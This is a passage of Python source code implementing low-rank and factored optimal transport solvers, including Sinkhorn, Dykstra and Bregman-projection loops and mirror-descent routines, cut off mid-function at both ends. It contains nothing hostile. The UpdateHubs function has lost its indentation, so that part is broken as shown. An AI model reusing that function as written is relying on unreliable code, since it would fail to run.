        Ktu = np.dot(B.T, np.dot(A.T, u)) + lam
        v = b / Ktu
        P1 = u.reshape((-1, 1)) * A
        P2 = B * v.reshape((1, -1))
        Kv = np.dot(A, np.dot(B, v)) + lam
        err = np.sum(np.abs(u * Kv - a))
        cost = compute_OT(P1, P2, C1, C2)
        if np.isnan(cost):
            print("Error: NaN OT value")
            return "Error"
        cost_hist.append(cost)
        time_hist.append(time.time() - t_start)
    return cost_hist[-1], np.array(cost_hist), np.array(time_hist), P1, P2
def UpdateHubs(X, Y, gamma_1, gamma_2):
Z = np.dot(gamma_1, X) + np.dot(gamma_2, Y)
norm = np.sum(gamma_1 + gamma_2, axis=1)
Z = (Z.T / norm).T
return Z
# Here cost is a function
def UpdatePlans(X, Y, Z, a, b, reg, cost, max_iter=1000, delta=1e-9, lam=0):
    """Compute the two partial plans gamma_1 (hubs -> X), gamma_2 (hubs -> Y)
    and the shared hub weights w by alternating Sinkhorn-type scalings.

    `cost` is a function mapping two point clouds to their cost matrix.
    gamma_1 is (r, n), gamma_2 is (r, m); their column marginals match a/b
    and both row marginals equal w. `lam` is unused (interface parity).
    """
    K1 = np.exp(-cost(Z, X) / reg)  # (r, n)
    K2 = np.exp(-cost(Z, Y) / reg)  # (r, m)
    r = np.shape(Z)[0]
    u1, u2 = np.ones(r), np.ones(r)
    v1, v2 = np.ones(np.shape(a)[0]), np.ones(np.shape(b)[0])
    v1_trans = np.dot(K1.T, u1)
    v2_trans = np.dot(K2.T, u2)
    w = np.ones(r) / r
    err = 1
    n_iter = 0
    while n_iter < max_iter:
        u1_prev, v1_prev = u1, v1
        u2_prev, v2_prev = u2, v2
        w_prev = w
        if err <= delta:
            break
        n_iter = n_iter + 1
        # Scale v's towards the data marginals a and b
        v1 = a / v1_trans
        u1_trans = np.dot(K1, v1)
        v2 = b / v2_trans
        u2_trans = np.dot(K2, v2)
        # Hub weights: geometric mean of the two row marginals
        w = (u1 * u1_trans * u2 * u2_trans) ** (1 / 2)
        # Scale u's so both plans share the row marginal w
        u1 = w / u1_trans
        u2 = w / u2_trans
        # Column-marginal violation
        v1_trans = np.dot(K1.T, u1)
        v2_trans = np.dot(K2.T, u2)
        err = (np.sum(np.abs(v1 * v1_trans - a))
               + np.sum(np.abs(v2 * v2_trans - b)))
        overflow = (np.any(np.isnan(u1)) or np.any(np.isnan(v1))
                    or np.any(np.isnan(u2)) or np.any(np.isnan(v2))
                    or np.any(np.isinf(u1)) or np.any(np.isinf(v1))
                    or np.any(np.isinf(u2)) or np.any(np.isinf(v2)))
        if overflow:
            # Machine precision reached: roll back one step and stop
            print("Warning: numerical errors at iteration", n_iter)
            u1, v1 = u1_prev, v1_prev
            u2, v2 = u2_prev, v2_prev
            w = w_prev
            break
    gamma_1 = u1.reshape((-1, 1)) * K1 * v1.reshape((1, -1))
    gamma_2 = u2.reshape((-1, 1)) * K2 * v2.reshape((1, -1))
    return gamma_1, gamma_2, w
# Here cost is a function
def UpdatePlans_LSE(X, Y, Z, a, b, reg, cost, max_iter=1000, delta=1e-9, lam=0):
    """Log-domain (log-sum-exp) version of UpdatePlans.

    Computes the partial plans P1 (hubs -> X, shape (r, n)) and
    P2 (hubs -> Y, shape (r, m)) plus the hub weights w, keeping the dual
    potentials f/g instead of the scalings for numerical stability.
    `cost` maps two point clouds to their cost matrix; `lam` is unused.
    """
    C1 = cost(Z, X)
    C2 = cost(Z, Y)
    r = np.shape(Z)[0]

    def log_kernel(f, g, C):
        # (f_i + g_j - C_ij) / reg -- the log of the scaled kernel
        return (f.reshape(-1, 1) + g.reshape(1, -1) - C) / reg

    f1, f2 = np.zeros(r), np.zeros(r)
    g1, g2 = np.zeros(np.shape(a)[0]), np.zeros(np.shape(b)[0])
    w = np.ones(r) / r
    err = 1
    n_iter = 0
    while n_iter < max_iter:
        f1_prev, g1_prev = f1, g1
        f2_prev, g2_prev = f2, g2
        w_prev = w
        if err <= delta:
            # Converged: return the plans from the last completed update
            return P1, P2, w
        n_iter = n_iter + 1
        # Dual update of g1, g2 (column marginals a and b)
        g1 = reg * np.log(a) + g1 - reg * scipy.special.logsumexp(
            log_kernel(f1, g1, C1), axis=0)
        g2 = reg * np.log(b) + g2 - reg * scipy.special.logsumexp(
            log_kernel(f2, g2, C2), axis=0)
        # Hub weights: geometric mean of the two row marginals
        M1 = log_kernel(f1, g1, C1)
        M2 = log_kernel(f2, g2, C2)
        P1, P2 = np.exp(M1), np.exp(M2)
        w = (np.sum(P1, axis=1) * np.sum(P2, axis=1)) ** (1 / 2)
        log_w = (1 / 2) * (scipy.special.logsumexp(M1, axis=1)
                           + scipy.special.logsumexp(M2, axis=1))
        # Dual update of f1, f2 (shared row marginal w)
        f1 = reg * log_w + f1 - reg * scipy.special.logsumexp(M1, axis=1)
        f2 = reg * log_w + f2 - reg * scipy.special.logsumexp(M2, axis=1)
        # Primal couplings induced by the new potentials
        P1 = np.exp(log_kernel(f1, g1, C1))
        P2 = np.exp(log_kernel(f2, g2, C2))
        err = (np.sum(np.abs(np.sum(P1, axis=0) - a))
               + np.sum(np.abs(np.sum(P2, axis=0) - b)))
        overflow = (np.any(np.isnan(f1)) or np.any(np.isnan(g1))
                    or np.any(np.isnan(f2)) or np.any(np.isnan(g2))
                    or np.any(np.isinf(f1)) or np.any(np.isinf(g1))
                    or np.any(np.isinf(f2)) or np.any(np.isinf(g2)))
        if overflow:
            # Machine precision reached: roll back one step and stop
            print("Warning: numerical errors at iteration", n_iter)
            f1, g1 = f1_prev, g1_prev
            f2, g2 = f2_prev, g2_prev
            w = w_prev
            break
    P1 = np.exp(log_kernel(f1, g1, C1))
    P2 = np.exp(log_kernel(f2, g2, C2))
    return P1, P2, w
# Same as UpdatePlans where the inputs are no more vectors but rather matrices
def UpdatePlans_Matrix(C1, C2, a, b, reg, max_iter=1000, delta=1e-9, lam=0):
    """Variant of UpdatePlans taking precomputed cost factors.

    C1 has shape (n, r) (data -> hubs) and C2 has shape (r, m)
    (hubs -> data). The plans are returned transposed — (n, r) and (m, r) —
    together with the hub weights w. `lam` is unused (interface parity).
    """
    K1 = np.exp(-C1.T / reg)  # (r, n)
    K2 = np.exp(-C2 / reg)    # (r, m)
    r = np.shape(C1)[1]
    u1, u2 = np.ones(r), np.ones(r)
    v1, v2 = np.ones(np.shape(a)[0]), np.ones(np.shape(b)[0])
    v1_trans = np.dot(K1.T, u1)
    v2_trans = np.dot(K2.T, u2)
    w = np.ones(r) / r
    err = 1
    n_iter = 0
    while n_iter < max_iter:
        u1_prev, v1_prev = u1, v1
        u2_prev, v2_prev = u2, v2
        w_prev = w
        if err <= delta:
            break
        n_iter = n_iter + 1
        # Scale v's towards the data marginals a and b
        v1 = a / v1_trans
        u1_trans = np.dot(K1, v1)
        v2 = b / v2_trans
        u2_trans = np.dot(K2, v2)
        # Hub weights: geometric mean of the two row marginals
        w = (u1 * u1_trans * u2 * u2_trans) ** (1 / 2)
        # Scale u's so both plans share the row marginal w
        u1 = w / u1_trans
        u2 = w / u2_trans
        # Column-marginal violation
        v1_trans = np.dot(K1.T, u1)
        v2_trans = np.dot(K2.T, u2)
        err = (np.sum(np.abs(v1 * v1_trans - a))
               + np.sum(np.abs(v2 * v2_trans - b)))
        overflow = (np.any(np.isnan(u1)) or np.any(np.isnan(v1))
                    or np.any(np.isnan(u2)) or np.any(np.isnan(v2))
                    or np.any(np.isinf(u1)) or np.any(np.isinf(v1))
                    or np.any(np.isinf(u2)) or np.any(np.isinf(v2)))
        if overflow:
            # Machine precision reached: roll back one step and stop
            print("Warning: numerical errors at iteration", n_iter)
            u1, v1 = u1_prev, v1_prev
            u2, v2 = u2_prev, v2_prev
            w = w_prev
            break
    gamma_1 = u1.reshape((-1, 1)) * K1 * v1.reshape((1, -1))
    gamma_2 = u2.reshape((-1, 1)) * K2 * v2.reshape((1, -1))
    return gamma_1.T, gamma_2.T, w
# Here cost is a function: only the Squared Euclidean is legal
def FactoredOT(
    X,
    Y,
    a,
    b,
    reg,
    rank,
    cost,
    max_iter=1000,
    delta=1e-3,
    max_iter_Update=1000,
    delta_Update=1e-9,
    lam_Update=0,
    LSE=True,
    time_out=200,
):
    """Factored (hub-based, low-rank) OT between (X, a) and (Y, b).

    Alternates between updating the two partial plans (UpdatePlans or its
    LSE variant) and moving the hubs (UpdateHubs), starting from k-means
    centroids of X. Returns (final cost, cost history, elapsed times,
    gamma1.T, gamma2.T, w), or "Error" if the objective becomes NaN.
    Only the squared Euclidean cost is supported for `cost`.
    """
    t_start = time.time()
    cost_hist, time_hist = [], []
    C = cost(X, Y)
    # Initialise the hubs with k-means centroids of the source cloud
    Z = KMeans(n_clusters=rank, random_state=0).fit(X).cluster_centers_
    w = np.ones(rank) / rank
    gamma1 = w.reshape((-1, 1)) * a.reshape((1, -1))
    gamma2 = w.reshape((-1, 1)) * b.reshape((1, -1))
    err = 1
    niter = 0
    while niter < max_iter:
        gamma1_prev, gamma2_prev, w_prev = gamma1, gamma2, w
        if err <= delta:
            break
        niter = niter + 1
        if LSE == False:
            gamma1, gamma2, w = UpdatePlans(
                X, Y, Z, a, b, reg, cost,
                max_iter=max_iter_Update, delta=delta_Update, lam=lam_Update)
        else:
            gamma1, gamma2, w = UpdatePlans_LSE(
                X, Y, Z, a, b, reg, cost,
                max_iter=max_iter_Update, delta=delta_Update, lam=lam_Update)
        # Move the hubs to the barycentres induced by the new plans
        Z = UpdateHubs(X, Y, gamma1, gamma2)
        # Current transport cost: trace(gamma1 @ (C @ gamma2.T / w))
        weighted = np.dot(C, gamma2.T) / w
        OT_trans = np.trace(np.dot(gamma1, weighted))
        if niter > 10:
            # Relative progress of the objective as stopping criterion
            err = np.abs(OT_trans - cost_hist[-1]) / cost_hist[-1]
            if np.isnan(err):
                print("Error computation of the stopping criterion", niter)
                gamma1, gamma2, w = gamma1_prev, gamma2_prev, w_prev
                break
        if np.isnan(OT_trans):
            print("Error: NaN OT value")
            return "Error"
        cost_hist.append(OT_trans)
        elapsed = time.time() - t_start
        time_hist.append(elapsed)
        if elapsed > time_out:
            return (cost_hist[-1], np.array(cost_hist), np.array(time_hist),
                    gamma1.T, gamma2.T, w)
    return (cost_hist[-1], np.array(cost_hist), np.array(time_hist),
            gamma1.T, gamma2.T, w)
def LR_Dykstra_Sin(K1, K2, K3, a, b, alpha, max_iter=1000, delta=1e-9, lam=0):
    """Dykstra's algorithm for the low-rank OT feasible set.

    Given kernel factors K1 (n, r), K2 (m, r) and initial hub vector K3,
    alternately project onto the marginal constraints (rows of Q -> a,
    rows of R -> b, hub weights bounded below by alpha, shared column
    marginal g) and return the scaled factors (Q, R, g). `lam` is a small
    additive regulariser preventing division by zero.
    """
    g_old = K3
    r = np.shape(K3)[0]
    v1_old, v2_old = np.ones(r), np.ones(r)
    u1, u2 = np.ones(np.shape(a)[0]), np.ones(np.shape(b)[0])
    # Dykstra correction terms, one per constraint set
    q_gi, q_gp = np.ones(r), np.ones(r)
    q_Q, q_R = np.ones(r), np.ones(r)
    err = 1
    n_iter = 0
    while n_iter < max_iter:
        u1_prev, v1_prev = u1, v1_old
        u2_prev, v2_prev = u2, v2_old
        g_prev = g_old
        if err <= delta:
            break
        n_iter = n_iter + 1
        # Projection on the data marginals and the box g >= alpha
        u1 = a / (np.dot(K1, v1_old) + lam)
        u2 = b / (np.dot(K2, v2_old) + lam)
        g = np.maximum(alpha, g_old * q_gi)
        q_gi = (g_old * q_gi) / (g + lam)
        g_old = g.copy()
        # Projection on the shared column marginal (geometric mean of three)
        v1_trans = np.dot(K1.T, u1)
        v2_trans = np.dot(K2.T, u2)
        g = (g_old * q_gp * v1_old * q_Q * v1_trans * v2_old * q_R * v2_trans) ** (1 / 3)
        v1 = g / (v1_trans + lam)
        v2 = g / (v2_trans + lam)
        q_gp = (g_old * q_gp) / (g + lam)
        q_Q = (q_Q * v1_old) / (v1 + lam)
        q_R = (q_R * v2_old) / (v2 + lam)
        v1_old, v2_old, g_old = v1.copy(), v2.copy(), g.copy()
        # Violation of the data marginals
        err = (np.sum(np.abs(u1 * np.dot(K1, v1) - a))
               + np.sum(np.abs(u2 * np.dot(K2, v2) - b)))
        diverged = (np.any(np.isnan(u1)) or np.any(np.isnan(v1))
                    or np.any(np.isnan(u2)) or np.any(np.isnan(v2))
                    or np.any(np.isinf(u1)) or np.any(np.isinf(v1))
                    or np.any(np.isinf(u2)) or np.any(np.isinf(v2)))
        if diverged:
            # Machine precision reached: roll back one step and stop
            print("Warning: numerical errors at iteration", n_iter)
            u1, v1 = u1_prev, v1_prev
            u2, v2 = u2_prev, v2_prev
            g = g_prev
            break
    Q = u1.reshape((-1, 1)) * K1 * v1.reshape((1, -1))
    R = u2.reshape((-1, 1)) * K2 * v2.reshape((1, -1))
    return Q, R, g
def LR_Dykstra_LSE_Sin(
    C1, C2, C3, a, b, alpha, gamma, max_iter=1000, delta=1e-9, lam=0
):
    """Log-sum-exp stabilized version of :func:`LR_Dykstra_Sin`.

    Runs the same Dykstra scheme but on the dual potentials (f*, g*, h)
    instead of the exponentiated scalings, which stays stable for small
    gamma. The inputs are cost-like terms: the corresponding kernels are
    K1 = exp(-gamma * C1), K2 = exp(-gamma * C2), and the inner-marginal
    kernel exp(gamma * C3) (see the call sites in Quad_LOT_MD / Lin_LOT_MD).

    Parameters
    ----------
    C1 : (n, r), C2 : (m, r), C3 : (r,) cost terms of the three factors.
    a, b : target row marginals of the couplings Q and R.
    alpha : lower bound enforced on the inner marginal g.
    gamma : inverse temperature of the mirror-descent step.
    max_iter, delta : iteration cap and stopping tolerance.
    lam : unused here; kept for signature symmetry with LR_Dykstra_Sin.

    Returns
    -------
    Q : (n, r), R : (m, r), g : (r,) as in LR_Dykstra_Sin.

    Notes
    -----
    Trailing comments count the arithmetic operations of each line.
    """
    h_old = C3
    r = np.shape(C3)[0]
    # Dual potentials (f*, g*, h) and Dykstra correction terms w_*.
    g1_old, g2_old = np.zeros(r), np.zeros(r)
    f1, f2 = np.zeros(np.shape(a)[0]), np.zeros(np.shape(b)[0])
    w_gi, w_gp = np.zeros(r), np.zeros(r)
    w_Q, w_R = np.zeros(r), np.zeros(r)
    err = 1
    n_iter = 0
    while n_iter < max_iter:
        # Keep the previous iterate so we can roll back on numerical failure.
        f1_prev, g1_prev = f1, g1_old
        f2_prev, g2_prev = f2, g2_old
        h_prev = h_old
        if err > delta:
            n_iter = n_iter + 1
            # First Projection
            C1_tilde = f1[:, None] + g1_old[None, :] - C1  # 2 * n * r
            C1_tilde = C1_tilde * gamma  # n * r
            f1 = (
                (1 / gamma) * np.log(a)
                + f1
                - (1 / gamma) * scipy.special.logsumexp(C1_tilde, axis=1)
            )  # 2 * n + 2 * n + n * r
            C2_tilde = f2[:, None] + g2_old[None, :] - C2  # 2 * m * r
            C2_tilde = C2_tilde * gamma  # m * r
            f2 = (
                (1 / gamma) * np.log(b)
                + f2
                - (1 / gamma) * scipy.special.logsumexp(C2_tilde, axis=1)
            )  # 2 * m + 2 * m + m * r
            # Clamp of g at alpha, performed in the log domain.
            h = h_old + w_gi  # 2 * r
            h = np.maximum((np.log(alpha) / gamma), h)  # r
            w_gi = h_old + w_gi - h  # 2 * r
            h_old = h.copy()
            # Update couplings
            C1_tilde = f1[:, None] + g1_old[None, :] - C1  # 2 * n * r
            C1_tilde = C1_tilde * gamma  # n * r
            alpha_1_trans = scipy.special.logsumexp(C1_tilde, axis=0)  # n * r
            C2_tilde = f2[:, None] + g2_old[None, :] - C2  # 2 * m * r
            C2_tilde = C2_tilde * gamma  # m * r
            alpha_2_trans = scipy.special.logsumexp(C2_tilde, axis=0)  # m * r
            # Second Projection
            h = (1 / 3) * (h_old + w_gp + w_Q + w_R)  # 4 * r
            h = h + (1 / (3 * gamma)) * alpha_1_trans  # 2 * r
            h = h + (1 / (3 * gamma)) * alpha_2_trans  # 2 * r
            g1 = h + g1_old - (1 / gamma) * alpha_1_trans  # 3 * r
            g2 = h + g2_old - (1 / gamma) * alpha_2_trans  # 3 * r
            w_Q = w_Q + g1_old - g1  # 2 * r
            w_R = w_R + g2_old - g2  # 2 * r
            w_gp = h_old + w_gp - h  # 2 * r
            g1_old = g1.copy()
            g2_old = g2.copy()
            h_old = h.copy()
            # Update couplings
            C1_tilde = f1[:, None] + g1_old[None, :] - C1  # 2 * n * r
            C1_tilde = C1_tilde * gamma  # n * r
            Q = np.exp(C1_tilde)  # n * r
            C2_tilde = f2[:, None] + g2_old[None, :] - C2  # 2 * n * r
            C2_tilde = C2_tilde * gamma  # n * r
            R = np.exp(C2_tilde)  # n * r
            g = np.exp(gamma * h)  # 2 * r
            # Update the error
            err_1 = np.sum(np.abs(np.sum(Q, axis=1) - a))
            err_2 = np.sum(np.abs(np.sum(R, axis=1) - b))
            err = err_1 + err_2
            if (
                np.any(np.isnan(f1))
                or np.any(np.isnan(g1))
                or np.any(np.isnan(f2))
                or np.any(np.isnan(g2))
                or np.any(np.isinf(f1))
                or np.any(np.isinf(g1))
                or np.any(np.isinf(f2))
                or np.any(np.isinf(g2))
            ):
                # we have reached the machine precision
                # come back to previous solution and quit loop
                print("Warning: numerical errors at iteration", n_iter)
                f1, g1 = f1_prev, g1_prev
                f2, g2 = f2_prev, g2_prev
                h = h_prev
                # Update couplings
                C1_tilde = f1[:, None] + g1_old[None, :] - C1
                C1_tilde = C1_tilde * gamma
                Q = np.exp(C1_tilde)
                C2_tilde = f2[:, None] + g2_old[None, :] - C2
                C2_tilde = C2_tilde * gamma
                R = np.exp(C2_tilde)
                g = np.exp(gamma * h)
                return Q, R, g
        else:
            # Converged on the previous iteration's couplings.
            return Q, R, g
    return Q, R, g
def LR_IBP_Sin(K1, K2, K3, a, b, max_iter=1000, delta=1e-9, lam=0):
    """Iterative Bregman Projections (IBP) for the low-rank OT sub-problem.

    Computes diagonal scalings of K1 and K2 such that the couplings
    Q = diag(u1) K1 diag(v1) and R = diag(u2) K2 diag(v2) satisfy
    Q 1 = a and R 1 = b while sharing the common inner marginal g
    (initialized from K3 and updated by geometric averaging).

    Parameters
    ----------
    K1 : (n, r) kernel for the coupling Q.
    K2 : (m, r) kernel for the coupling R.
    K3 : (r,) kernel (initial guess) for the inner marginal g.
    a, b : target row marginals of Q and R.
    max_iter : maximum number of IBP iterations.
    delta : stopping tolerance on the total row-marginal violation.
    lam : unused here; kept for signature symmetry with LR_Dykstra_Sin.

    Returns
    -------
    Q : (n, r) coupling, R : (m, r) coupling, g : (r,) inner marginal.
    """
    r = np.shape(K3)[0]
    g = K3
    v1, v2 = np.ones(r), np.ones(r)
    # Bug fix: u2 scales R, whose row marginal is b (length m). The original
    # code initialized and updated u2 with a (length n), which is wrong and
    # crashes whenever n != m.
    u1 = np.ones(np.shape(a)[0])
    u2 = np.ones(np.shape(b)[0])
    u1_trans = np.dot(K1, v1)  # n * r
    u2_trans = np.dot(K2, v2)  # m * r
    err = 1
    n_iter = 0
    while n_iter < max_iter and err > delta:
        # Keep the previous iterate so we can roll back on numerical failure.
        u1_prev, v1_prev = u1, v1
        u2_prev, v2_prev = u2, v2
        g_prev = g
        n_iter = n_iter + 1
        # Scale rows of Q towards the marginal a.
        u1 = a / u1_trans  # n
        v1_trans = np.dot(K1.T, u1)  # n * r
        # Scale rows of R towards the marginal b (was `a` in the original).
        u2 = b / u2_trans  # m
        v2_trans = np.dot(K2.T, u2)  # m * r
        # Geometric-mean update of the shared inner marginal.
        g = (g * v1 * v1_trans * v2 * v2_trans) ** (1 / 3)  # 5 * r
        v1 = g / v1_trans  # r
        v2 = g / v2_trans  # r
        # Marginal violation after the update.
        u1_trans = np.dot(K1, v1)
        err_1 = np.sum(np.abs(u1 * u1_trans - a))
        u2_trans = np.dot(K2, v2)
        err_2 = np.sum(np.abs(u2 * u2_trans - b))
        err = err_1 + err_2
        if (
            np.any(np.isnan(u1))
            or np.any(np.isnan(v1))
            or np.any(np.isnan(u2))
            or np.any(np.isnan(v2))
            or np.any(np.isinf(u1))
            or np.any(np.isinf(v1))
            or np.any(np.isinf(u2))
            or np.any(np.isinf(v2))
        ):
            # We have reached machine precision: fall back to the previous
            # iterate and stop.
            print("Warning: numerical errors at iteration", n_iter)
            u1, v1 = u1_prev, v1_prev
            u2, v2 = u2_prev, v2_prev
            g = g_prev
            break
    # Assemble the couplings from the final scalings.
    Q = u1.reshape((-1, 1)) * K1 * v1.reshape((1, -1))
    R = u2.reshape((-1, 1)) * K2 * v2.reshape((1, -1))
    return Q, R, g
# If C_init == True: cost is the cost matrix
# If C_init == False: cost is the cost function
# Init == 'trivial', 'random', 'kmeans'
def Quad_LOT_MD(
    X,
    Y,
    a,
    b,
    rank,
    reg,
    alpha,
    cost,
    Init="trivial",
    seed_init=49,
    C_init=False,
    reg_init=1e-3,
    gamma_init="theory",
    gamma_0=1e-1,
    method="IBP",
    max_iter=1000,
    delta=1e-3,
    max_iter_IBP=1000,
    delta_IBP=1e-9,
    lam_IBP=0,
    time_out=200,
):
    """Mirror-descent solver for low-rank OT with a full (n x m) cost matrix.

    Alternates a mirror-descent step on the low-rank factors (Q, R, g) with a
    projection onto the marginal constraints performed by one of the inner
    solvers LR_IBP_Sin / LR_Dykstra_Sin / LR_Dykstra_LSE_Sin. See Lin_LOT_MD
    for the variant with a factorized cost.

    Parameters
    ----------
    X, Y : source / target point clouds.
    a, b : source / target marginals.
    rank : rank r of the couplings Q (n x r), R (m x r).
    reg : entropic regularization of the objective.
    alpha : lower bound on the inner marginal g (used by Dykstra methods and
        by the 'theory' step-size rule).
    cost : cost function if C_init is False, otherwise the cost matrix itself.
    Init : 'trivial', 'random' or 'kmeans' initialization of (Q, R, g).
    seed_init : seed used by the random initialization.
    C_init : whether `cost` is a precomputed cost matrix.
    reg_init : regularization used by the k-means initialization.
    gamma_init : 'theory', 'regularization' or 'arbitrary' step-size rule.
    gamma_0 : step size used when gamma_init == 'arbitrary'.
    method : 'IBP', 'Dykstra' or 'Dykstra_LSE' inner projection solver.
    max_iter, delta : outer iteration cap and relative stopping tolerance.
    max_iter_IBP, delta_IBP, lam_IBP : parameters forwarded to the inner solver.
    time_out : wall-clock budget in seconds.

    Returns
    -------
    (final cost, cost history, time history, Q, R, g), or the string
    "Error" on failure. Trailing comments count arithmetic operations.
    """
    start = time.time()
    acc = []
    times = []
    n, m = np.shape(a)[0], np.shape(b)[0]
    if C_init == False:
        C = cost(X, Y)
    else:
        C = cost
        # A length-2 cost is a factorization (C1, C2): not supported here.
        if len(C) == 2:
            print("Error: cost not adapted")
            return "Error"
    #### Initialization #####
    if Init == "kmeans":
        ## Init with K-means
        # NOTE: KMeans and UpdatePlans are defined/imported elsewhere in this
        # module (presumably sklearn.cluster.KMeans -- confirm).
        g = np.ones(rank) / rank
        kmeans = KMeans(n_clusters=rank, random_state=0).fit(X)
        Z = kmeans.cluster_centers_
        gamma1, gamma2, g = UpdatePlans(
            X,
            Y,
            Z,
            a,
            b,
            reg_init,
            cost,
            max_iter=max_iter_IBP,
            delta=delta_IBP,
            lam=lam_IBP,
        )
        Q, R = gamma1.T, gamma2.T
    # Init random
    if Init == "random":
        np.random.seed(seed_init)
        g = np.abs(np.random.randn(rank))
        g = g + 1  # r
        g = g / np.sum(g)  # r
        seed_init = seed_init + 1000
        np.random.seed(seed_init)
        Q = np.abs(np.random.randn(n, rank))
        Q = Q + 1  # n * r
        Q = (Q.T * (a / np.sum(Q, axis=1))).T  # n + n * r
        seed_init = seed_init + 1000
        np.random.seed(seed_init)
        R = np.abs(np.random.randn(m, rank))
        R = R + 1  # m * r
        R = (R.T * (b / np.sum(R, axis=1))).T  # m + m * r
    ### Trivial Init
    if Init == "trivial":
        # Rank-2 mixture of deterministic marginals, feasible by construction.
        g = np.ones(rank) / rank  # r
        lambda_1 = min(np.min(a), np.min(g), np.min(b)) / 2
        a1 = np.arange(1, np.shape(a)[0] + 1)
        a1 = a1 / np.sum(a1)  # n
        a2 = (a - lambda_1 * a1) / (1 - lambda_1)  # 2 * n
        b1 = np.arange(1, np.shape(b)[0] + 1)
        b1 = b1 / np.sum(b1)  # m
        b2 = (b - lambda_1 * b1) / (1 - lambda_1)  # 2 * m
        g1 = np.arange(1, rank + 1)
        g1 = g1 / np.sum(g1)  # r
        g2 = (g - lambda_1 * g1) / (1 - lambda_1)  # 2 * r
        Q = lambda_1 * np.dot(a1[:, None], g1.reshape(1, -1)) + (1 - lambda_1) * np.dot(
            a2[:, None], g2.reshape(1, -1)  # 4 * n * r
        )
        R = lambda_1 * np.dot(b1[:, None], g1.reshape(1, -1)) + (1 - lambda_1) * np.dot(
            b2[:, None], g2.reshape(1, -1)  # 4 * m * r
        )
    # Step-size selection.
    if gamma_init == "theory":
        L_trans = (2 / (alpha) ** 4) * (np.linalg.norm(C) ** 2)
        L_trans = L_trans + ((reg + 2 * np.linalg.norm(C)) / (alpha ** 3)) ** 2
        L = np.sqrt(3 * L_trans)
        gamma = 1 / L
    if gamma_init == "regularization":
        gamma = 1 / reg
    if gamma_init == "arbitrary":
        gamma = gamma_0
    err = 1
    niter = 0
    while niter < max_iter:
        Q_prev = Q
        R_prev = R
        g_prev = g
        if err > delta:
            niter = niter + 1
            # Gradient of the objective at (Q, R, g): costs of the
            # mirror-descent step for each factor.
            K1_trans_0 = np.dot(C, R)  # n * m * r
            C1_trans = K1_trans_0 / g + (reg - (1 / gamma)) * np.log(Q)  # 3 * n * r
            K2_trans_0 = np.dot(C.T, Q)  # m * n * r
            C2_trans = K2_trans_0 / g + (reg - (1 / gamma)) * np.log(R)  # 3 * m * r
            omega = np.diag(np.dot(Q.T, K1_trans_0))  # r * n * r
            C3_trans = omega / (g ** 2) - (reg - (1 / gamma)) * np.log(g)  # 4 * r
            # Update the coupling
            if method == "IBP":
                K1 = np.exp((-gamma) * C1_trans)
                K2 = np.exp((-gamma) * C2_trans)
                K3 = np.exp(gamma * C3_trans)
                Q, R, g = LR_IBP_Sin(
                    K1,
                    K2,
                    K3,
                    a,
                    b,
                    max_iter=max_iter_IBP,
                    delta=delta_IBP,
                    lam=lam_IBP,
                )
            if method == "Dykstra":
                K1 = np.exp((-gamma) * C1_trans)
                K2 = np.exp((-gamma) * C2_trans)
                K3 = np.exp(gamma * C3_trans)
                Q, R, g = LR_Dykstra_Sin(
                    K1,
                    K2,
                    K3,
                    a,
                    b,
                    alpha,
                    max_iter=max_iter_IBP,
                    delta=delta_IBP,
                    lam=lam_IBP,
                )
            if method == "Dykstra_LSE":
                # Log-domain solver takes the costs directly (no exp).
                Q, R, g = LR_Dykstra_LSE_Sin(
                    C1_trans,
                    C2_trans,
                    C3_trans,
                    a,
                    b,
                    alpha,
                    gamma,
                    max_iter=max_iter_IBP,
                    delta=delta_IBP,
                    lam=lam_IBP,
                )
            # Update the total cost: <Q, C R diag(1/g)> = OT cost of the
            # current low-rank plan Q diag(1/g) R^T.
            C_trans = np.dot(C, R)
            C_trans = C_trans / g
            G = np.dot(Q.T, C_trans)
            OT_trans = np.trace(G)
            if niter > 10:
                ## Update the error: practical (relative) error
                err = np.abs(OT_trans - acc[-1]) / acc[-1]
                if np.isnan(err):
                    print("Error computation of the stopping criterion", niter)
                    Q = Q_prev
                    R = R_prev
                    g = g_prev
                    break
            if np.isnan(OT_trans) == True:
                print("Error: NaN OT value")
                return "Error"
            else:
                acc.append(OT_trans)
                end = time.time()
                tim_actual = end - start
                times.append(tim_actual)
                # Wall-clock budget exhausted: return the current state.
                if tim_actual > time_out:
                    return (
                        acc[-1],
                        np.array(acc),
                        np.array(times),
                        Q,
                        R,
                        g,
                    )
        else:
            # err <= delta: converged.
            return (
                acc[-1],
                np.array(acc),
                np.array(times),
                Q,
                R,
                g,
            )
    return acc[-1], np.array(acc), np.array(times), Q, R, g
# gamma_init = 'theory', 'regularization', 'arbitrary'
# method = 'IBP', 'Dykstra', 'Dykstra_LSE'
# If C_init = True: cost_factorized = C1,C2
# If C_init = False: cost_factorized is a function
# Init = 'trivial', kmeans', 'random'
def Lin_LOT_MD(
    X,
    Y,
    a,
    b,
    rank,
    reg,
    alpha,
    cost,
    cost_factorized,
    Init="trivial",
    seed_init=49,
    C_init=False,
    reg_init=1e-1,
    gamma_init="theory",
    gamma_0=1e-1,
    method="IBP",
    max_iter=1000,
    delta=1e-3,
    max_iter_IBP=1000,
    delta_IBP=1e-9,
    lam_IBP=0,
    time_out=200,
):
    """Mirror-descent solver for low-rank OT with a factorized cost C1 @ C2.

    Same scheme as Quad_LOT_MD, but the cost matrix is never materialized:
    products with C = C1 @ C2 (C1: n x d, C2: d x m) are computed in linear
    memory, hence the 'Lin' prefix.

    Parameters
    ----------
    X, Y : source / target point clouds.
    a, b : source / target marginals.
    rank : rank r of the couplings Q (n x r), R (m x r).
    reg : entropic regularization of the objective.
    alpha : lower bound on the inner marginal g (used by Dykstra methods and
        by the 'theory' step-size rule).
    cost : cost function, used only by the k-means initialization.
    cost_factorized : function returning (C1, C2) if C_init is False,
        otherwise the pair (C1, C2) itself.
    Init : 'trivial', 'random' or 'kmeans' initialization of (Q, R, g).
    seed_init : seed used by the random initialization.
    C_init : whether `cost_factorized` is the precomputed pair (C1, C2).
    reg_init : regularization used by the k-means initialization.
    gamma_init : 'theory', 'regularization' or 'arbitrary' step-size rule.
    gamma_0 : step size used when gamma_init == 'arbitrary'.
    method : 'IBP', 'Dykstra' or 'Dykstra_LSE' inner projection solver.
    max_iter, delta : outer iteration cap and relative stopping tolerance.
    max_iter_IBP, delta_IBP, lam_IBP : parameters forwarded to the inner solver.
    time_out : wall-clock budget in seconds.

    Returns
    -------
    (final cost, cost history, time history, Q, R, g), or the string
    "Error" on failure. Trailing comments count arithmetic operations.
    """
    start = time.time()
    acc = []
    times = []
    n, m = np.shape(a)[0], np.shape(b)[0]
    if C_init == False:
